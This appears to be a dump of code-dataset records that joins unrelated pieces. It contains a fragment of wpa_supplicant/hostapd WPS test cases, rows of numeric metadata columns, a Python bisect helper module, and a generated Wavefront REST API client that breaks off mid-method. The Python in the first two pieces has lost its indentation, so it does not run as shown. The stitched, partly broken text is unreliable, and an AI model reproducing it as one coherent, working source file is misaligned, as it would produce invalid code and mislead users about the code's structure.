dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-unexpected",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("No phase1 parameter")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("No PIN/PBC in phase1")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="foo", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Invalid pkhash in phase1")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="foo pkhash=q pbc=1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Zero fragment_size")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
fragment_size="0", phase1="pin=12345670", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["WPS-M2D"], timeout=5)
if ev is None:
raise Exception("No M2D seen")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Missing new_auth")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="pin=12345670 new_ssid=aa", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Missing new_encr")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="pin=12345670 new_auth=WPA2PSK new_ssid=aa", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Missing new_key")
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="WSC", identity="WFA-SimpleConfig-Enrollee-1-0",
phase1="pin=12345670 new_auth=WPA2PSK new_ssid=aa new_encr=CCMP",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("No EAP-Failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_ap_wps_and_bss_limit(dev, apdev):
"""WPS and wpa_supplicant BSS entry limit"""
try:
_test_ap_wps_and_bss_limit(dev, apdev)
finally:
dev[0].request("SET bss_max_count 200")
pass
def _test_ap_wps_and_bss_limit(dev, apdev):
params = { "ssid": "test-wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" }
hapd = hostapd.add_ap(apdev[0], params)
params = { "ssid": "test-wps-2", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "1234567890", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" }
hapd2 = hostapd.add_ap(apdev[1], params)
id = dev[1].add_network()
dev[1].set_network(id, "mode", "2")
dev[1].set_network_quoted(id, "ssid", "wpas-ap-no-wps")
dev[1].set_network_quoted(id, "psk", "12345678")
dev[1].set_network(id, "frequency", "2462")
dev[1].set_network(id, "scan_freq", "2462")
dev[1].set_network(id, "wps_disabled", "1")
dev[1].select_network(id)
id = dev[2].add_network()
dev[2].set_network(id, "mode", "2")
dev[2].set_network_quoted(id, "ssid", "wpas-ap")
dev[2].set_network_quoted(id, "psk", "12345678")
dev[2].set_network(id, "frequency", "2437")
dev[2].set_network(id, "scan_freq", "2437")
dev[2].select_network(id)
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
id = wpas.add_network()
wpas.set_network(id, "mode", "2")
wpas.set_network_quoted(id, "ssid", "wpas-ap")
wpas.set_network_quoted(id, "psk", "12345678")
wpas.set_network(id, "frequency", "2437")
wpas.set_network(id, "scan_freq", "2437")
wpas.select_network(id)
dev[1].wait_connected()
dev[2].wait_connected()
wpas.wait_connected()
wpas.request("WPS_PIN any 12345670")
hapd.request("WPS_PBC")
hapd2.request("WPS_PBC")
dev[0].request("SET bss_max_count 1")
id = dev[0].add_network()
dev[0].set_network_quoted(id, "ssid", "testing")
id = dev[0].add_network()
dev[0].set_network_quoted(id, "ssid", "testing")
dev[0].set_network(id, "key_mgmt", "WPS")
dev[0].request("WPS_PBC")
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"], timeout=10)
dev[0].request("WPS_CANCEL")
id = dev[0].add_network()
dev[0].set_network_quoted(id, "ssid", "testing")
dev[0].set_network(id, "key_mgmt", "WPS")
dev[0].scan(freq="2412")
def test_ap_wps_pbc_2ap(dev, apdev):
"""WPS PBC with two APs advertising same SSID"""
params = { "ssid": "wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1"}
hapd = hostapd.add_ap(apdev[0], params)
params = { "ssid": "wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "123456789", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1"}
hapd2 = hostapd.add_ap(apdev[1], params)
hapd.request("WPS_PBC")
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="force_connect_cmd=1")
wpas.dump_monitor()
wpas.scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
wpas.scan_for_bss(apdev[1]['bssid'], freq="2412")
wpas.request("WPS_PBC")
wpas.wait_connected()
wpas.request("DISCONNECT")
hapd.request("DISABLE")
hapd2.request("DISABLE")
wpas.flush_scan_cache()
def test_ap_wps_er_enrollee_to_conf_ap(dev, apdev):
"""WPS ER enrolling a new device to a configured AP"""
try:
_test_ap_wps_er_enrollee_to_conf_ap(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_enrollee_to_conf_ap(dev, apdev):
ssid = "wps-er-enrollee-to-conf-ap"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"}
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
id = dev[0].connect(ssid, psk="12345678", scan_freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
pin = dev[2].wps_read_pin()
addr2 = dev[2].own_addr()
dev[0].dump_monitor()
dev[2].scan_for_bss(bssid, freq=2412)
dev[2].dump_monitor()
dev[2].request("WPS_PIN %s %s" % (bssid, pin))
for i in range(3):
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=10)
if ev is None:
raise Exception("Enrollee not seen")
if addr2 in ev:
break
if addr2 not in ev:
raise Exception("Unexpected Enrollee MAC address")
dev[0].dump_monitor()
dev[0].request("WPS_ER_SET_CONFIG " + ap_uuid + " " + str(id))
dev[0].request("WPS_ER_PIN " + addr2 + " " + pin + " " + addr2)
dev[2].wait_connected(timeout=30)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
def test_ap_wps_er_enrollee_to_conf_ap2(dev, apdev):
"""WPS ER enrolling a new device to a configured AP (2)"""
try:
_test_ap_wps_er_enrollee_to_conf_ap2(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_enrollee_to_conf_ap2(dev, apdev):
ssid = "wps-er-enrollee-to-conf-ap"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"}
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
id = dev[0].connect(ssid, psk="12345678", scan_freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not in settings")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
pin = dev[1].wps_read_pin()
addr1 = dev[1].own_addr()
dev[0].dump_monitor()
dev[0].request("WPS_ER_PIN any " + pin)
time.sleep(0.1)
dev[1].scan_for_bss(bssid, freq=2412)
dev[1].request("WPS_PIN any %s" % pin)
ev = dev[1].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("Enrollee did not report success")
dev[1].wait_connected(timeout=15)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
def test_ap_wps_ignore_broadcast_ssid(dev, apdev):
"""WPS AP trying to ignore broadcast SSID"""
ssid = "test-wps"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"ignore_broadcast_ssid": "1" })
if "FAIL" not in hapd.request("WPS_PBC"):
raise Exception("WPS unexpectedly enabled")
def test_ap_wps_wep(dev, apdev):
"""WPS AP trying to enable WEP"""
ssid = "test-wps"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"ieee80211n": "0", "wep_key0": '"hello"' })
if "FAIL" not in hapd.request("WPS_PBC"):
raise Exception("WPS unexpectedly enabled")
def test_ap_wps_tkip(dev, apdev):
"""WPS AP trying to enable TKIP"""
ssid = "test-wps"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"ieee80211n": "0", "wpa": '1',
"wpa_key_mgmt": "WPA-PSK",
"wpa_passphrase": "12345678" })
if "FAIL" not in hapd.request("WPS_PBC"):
raise Exception("WPS unexpectedly enabled")
def test_ap_wps_conf_dummy_cred(dev, apdev):
"""WPS PIN provisioning with configured AP using dummy cred"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
hapd.request("WPS_PIN any 12345670")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
try:
hapd.set("wps_testing_dummy_cred", "1")
dev[0].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
for i in range(1, 3):
ev = dev[0].wait_event(["WPS-CRED-RECEIVED"], timeout=15)
if ev is None:
raise Exception("WPS credential %d not received" % i)
dev[0].wait_connected(timeout=30)
finally:
hapd.set("wps_testing_dummy_cred", "0")
def test_ap_wps_rf_bands(dev, apdev):
"""WPS and wps_rf_bands configuration"""
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_rf_bands": "ag" }
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
hapd.request("WPS_PBC")
dev[0].scan_for_bss(bssid, freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + bssid)
dev[0].wait_connected(timeout=30)
bss = dev[0].get_bss(bssid)
logger.info("BSS: " + str(bss))
if "103c000103" not in bss['ie']:
raise Exception("RF Bands attribute with expected values not found")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.set("wps_rf_bands", "ad")
hapd.set("wps_rf_bands", "a")
hapd.set("wps_rf_bands", "g")
hapd.set("wps_rf_bands", "b")
hapd.set("wps_rf_bands", "ga")
hapd.disable()
dev[0].dump_monitor()
dev[0].flush_scan_cache()
def test_ap_wps_pbc_in_m1(dev, apdev):
"""WPS and pbc_in_m1"""
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"config_methods": "virtual_push_button virtual_display",
"pbc_in_m1": "1" }
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
hapd.request("WPS_PBC")
dev[0].scan_for_bss(bssid, freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + bssid)
dev[0].wait_connected(timeout=30)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.disable()
dev[0].dump_monitor()
dev[0].flush_scan_cache()
def test_ap_wps_pin_start_failure(dev, apdev):
"""WPS_PIN start failure"""
with alloc_fail(dev[0], 1, "wpas_wps_start_dev_pw"):
if "FAIL" not in dev[0].request("WPS_PIN any 12345670"):
raise Exception("WPS_PIN not rejected during OOM")
with alloc_fail(dev[0], 1, "wpas_wps_start_dev_pw"):
if "FAIL" not in dev[0].request("WPS_PIN any"):
raise Exception("WPS_PIN not rejected during OOM")
def test_ap_wps_ap_pin_failure(dev, apdev):
"""WPS_AP_PIN failure"""
id = dev[0].add_network()
dev[0].set_network(id, "mode", "2")
dev[0].set_network_quoted(id, "ssid", "wpas-ap-wps")
dev[0].set_network_quoted(id, "psk", "1234567890")
dev[0].set_network(id, "frequency", "2412")
dev[0].set_network(id, "scan_freq", "2412")
dev[0].select_network(id)
dev[0].wait_connected()
with fail_test(dev[0], 1,
"os_get_random;wpa_supplicant_ctrl_iface_wps_ap_pin"):
if "FAIL" not in dev[0].request("WPS_AP_PIN random"):
raise Exception("WPS_AP_PIN random accepted")
with alloc_fail(dev[0], 1, "wpas_wps_ap_pin_set"):
if "FAIL" not in dev[0].request("WPS_AP_PIN set 12345670"):
raise Exception("WPS_AP_PIN set accepted")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
def test_ap_wps_random_uuid(dev, apdev, params):
"""WPS and random UUID on Enrollee"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
config = os.path.join(params['logdir'], 'ap_wps_random_uuid.conf')
with open(config, "w") as f:
f.write("auto_uuid=1\n")
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
uuid = []
for i in range(3):
wpas.interface_add("wlan5", config=config)
wpas.scan_for_bss(apdev[0]['bssid'], freq="2412")
wpas.dump_monitor()
wpas.request("WPS_PBC " + apdev[0]['bssid'])
ev = hapd.wait_event(["WPS-ENROLLEE-SEEN"], timeout=10)
if ev is None:
raise Exception("Enrollee not seen")
uuid.append(ev.split(' ')[2])
wpas.request("WPS_CANCEL")
wpas.dump_monitor()
wpas.interface_remove("wlan5")
hapd.dump_monitor()
logger.info("Seen UUIDs: " + str(uuid))
if uuid[0] == uuid[1] or uuid[0] == uuid[2] or uuid[1] == uuid[2]:
raise Exception("Same UUID used multiple times")
def test_ap_wps_conf_pin_gcmp_128(dev, apdev):
"""WPS PIN provisioning with configured AP using GCMP-128"""
run_ap_wps_conf_pin_cipher(dev, apdev, "GCMP")
def test_ap_wps_conf_pin_gcmp_256(dev, apdev):
"""WPS PIN provisioning with configured AP using GCMP-256"""
run_ap_wps_conf_pin_cipher(dev, apdev, "GCMP-256")
def test_ap_wps_conf_pin_ccmp_256(dev, apdev):
"""WPS PIN provisioning with configured AP using CCMP-256"""
run_ap_wps_conf_pin_cipher(dev, apdev, "CCMP-256")
def run_ap_wps_conf_pin_cipher(dev, apdev, cipher):
if cipher not in dev[0].get_capability("pairwise"):
raise HwsimSkip("Cipher %s not supported" % cipher)
ssid = "test-wps-conf-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK",
"rsn_pairwise": cipher })
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=15)
| 40.430716
| 754
| 0.631862
| 59,916
| 406,733
| 4.057397
| 0.025018
| 0.024434
| 0.014253
| 0.020732
| 0.862758
| 0.838069
| 0.814823
| 0.786634
| 0.756305
| 0.728588
| 0
| 0.049444
| 0.223491
| 406,733
| 10,059
| 755
| 40.434735
| 0.720279
| 0.039549
| 0
| 0.734183
| 0
| 0.019948
| 0.228484
| 0.033122
| 0
| 0
| 0.0027
| 0
| 0
| 1
| 0.044145
| false
| 0.017351
| 0.004249
| 0.000118
| 0.056657
| 0.000118
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c31640b5a83760a1729390ec4b56a8433add552
| 2,797
|
py
|
Python
|
src/utils/bisect.py
|
simonepri/varname-transformers
|
4c406ab5ae815dc065662af574cd2d1a521b974f
|
[
"MIT"
] | 10
|
2020-02-27T12:01:53.000Z
|
2020-04-11T09:26:39.000Z
|
src/utils/bisect.py
|
simonepri/varname-seq2seq
|
4c406ab5ae815dc065662af574cd2d1a521b974f
|
[
"MIT"
] | null | null | null |
src/utils/bisect.py
|
simonepri/varname-seq2seq
|
4c406ab5ae815dc065662af574cd2d1a521b974f
|
[
"MIT"
] | null | null | null |
from typing import * # pylint: disable=W0401,W0614
# pylint: disable=C0103
def bisect_right(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: int = None
) -> int:
"""Return the index where to insert item x in list a, assuming a is sorted.
The return value i is such that all e in a[:i] have e <= x, and all e in
a[i:] have e > x. So if x already appears in the list, a.insert(x) will
insert just after the rightmost x already there.
Optional args lo (default 0) and hi (default len(a)) bound the
slice of a to be searched.
"""
if lo < 0:
raise ValueError("lo must be non-negative")
if hi is None:
hi = len(a)
while lo < hi:
mid = (lo + hi) // 2
if x < key(a[mid]):
hi = mid
else:
lo = mid + 1
return lo
# pylint: disable=C0103
def bisect_left(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: int = None
) -> int:
"""Return the index where to insert item x in list a, assuming a is sorted.
The return value i is such that all e in a[:i] have e < x, and all e in
a[i:] have e >= x. So if x already appears in the list, a.insert(x) will
insert just before the leftmost x already there.
Optional args lo (default 0) and hi (default len(a)) bound the
slice of a to be searched.
"""
if lo < 0:
raise ValueError("lo must be non-negative")
if hi is None:
hi = len(a)
while lo < hi:
mid = (lo + hi) // 2
if key(a[mid]) < x:
lo = mid + 1
else:
hi = mid
return lo
# pylint: disable=C0103
def index_lt(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: int = None
) -> int:
"""Locate the index of the rightmost value less than x"""
i = bisect_left(a, x, key, lo, hi)
if i:
return i - 1
raise ValueError
# pylint: disable=C0103
def index_le(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: int = None
) -> int:
"""Locate the index of the rightmost value less than or equal to x"""
i = bisect_right(a, x, key, lo, hi)
if i:
return i - 1
raise ValueError
# pylint: disable=C0103
def index_gt(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: int = None
) -> int:
"""Locate the index of the leftmost value greater than x"""
i = bisect_right(a, x, key, lo, hi)
if i != len(a):
return i
raise ValueError
# pylint: disable=C0103
def index_ge(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: int = None
) -> int:
"""Locate the index of the leftmost item greater than or equal to x"""
i = bisect_left(a, x, key, lo, hi)
if i != len(a):
return i
raise ValueError
| 29.442105
| 80
| 0.576689
| 475
| 2,797
| 3.374737
| 0.172632
| 0.019963
| 0.067374
| 0.078603
| 0.898316
| 0.87461
| 0.838428
| 0.808484
| 0.808484
| 0.808484
| 0
| 0.02449
| 0.299249
| 2,797
| 94
| 81
| 29.755319
| 0.793367
| 0.397211
| 0
| 0.842105
| 0
| 0
| 0.028768
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.017544
| 0
| 0.22807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c353f83cafcc1bc04b54e35fe94e1ce36881611
| 40,006
|
py
|
Python
|
wavefront_api_client/api/usage_api.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
wavefront_api_client/api/usage_api.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
wavefront_api_client/api/usage_api.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Wavefront REST API Documentation
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class UsageApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_accounts(self, id, **kwargs): # noqa: E501
"""Add accounts to ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_accounts(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of accounts to be added to ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_accounts_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.add_accounts_with_http_info(id, **kwargs) # noqa: E501
return data
def add_accounts_with_http_info(self, id, **kwargs): # noqa: E501
"""Add accounts to ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_accounts_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of accounts to be added to ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_accounts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `add_accounts`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}/addAccounts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_groups(self, id, **kwargs): # noqa: E501
"""Add groups to the ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_groups(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of groups to be added to the ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_groups_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.add_groups_with_http_info(id, **kwargs) # noqa: E501
return data
def add_groups_with_http_info(self, id, **kwargs): # noqa: E501
"""Add groups to the ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_groups_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of groups to be added to the ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_groups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `add_groups`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
